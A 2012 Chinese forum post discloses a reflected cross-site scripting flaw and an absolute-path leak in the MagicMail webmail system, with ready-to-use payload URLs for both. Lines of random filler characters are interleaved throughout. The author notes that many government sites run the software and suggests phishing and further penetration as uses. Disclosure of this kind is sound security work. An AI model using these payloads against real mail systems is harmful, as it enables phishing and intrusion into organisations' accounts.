今天上午在黑盒测试本地的教育网的时候发现的一个邮件系统漏洞
+ [9 [/ U9 J7 f/ U2 K/ ~, l B/ @
# N4 `+ L2 R" F" c1 H+ W8 m( t - s) r0 F8 h5 @6 |
包含 一个反射性XSS 以及 绝对路径泄漏2 A' r/ y& e: n
看了看 貌似全部是linux的。/ U& t% |% e0 [1 \+ f
% S& l2 v" y( b- M* V5 a- \ @
关键字:迈捷邮件系统 by MagicMail
9 S& r8 y$ E$ Y# T
4 H9 n, @7 D* c9 e O7 y可以看到很多政府网站都用这个邮件系统/ l8 V, I' S1 b( n g
e$ w- }& [8 j0 Y0 A- U/ b, ~
绝对路径 http://madman.in/index.php?login_type=declare&language=. {: Z/ S2 [/ N
4 @' Z) _( g# D- D; j' Z! s
2 \1 G6 h4 ?1 _ A: _
; Q# i, `; S: D$ @$ ^" W; SXSS:http://madman.in/index.php?login_type=declare&language=–%3E%27%22%3E%3Csvg%3E%3Cscript/xlink:href=data:,while%28true%29{alert%281%29}%3E%3C/script%3E
3 R" _- B6 g( h4 p/ f; ^" n
C, ?: k& Z% q7 s% y3 `; d
0 d% Y* T* i# X* @$ d% a" \" `# p$ L. y: r
虽然危害不是很大,不过利用起来还是可以的 比如 钓鱼 比如进一步的渗透 等等9 }2 d, `: d) R5 x
- t4 s. z2 J7 p3 B2 c- _修复方案:看官方补丁吧。/ i( h: x, @: w4 p5 P! m
|
发表于 2012-11-9 20:38:41
收藏
支持
反对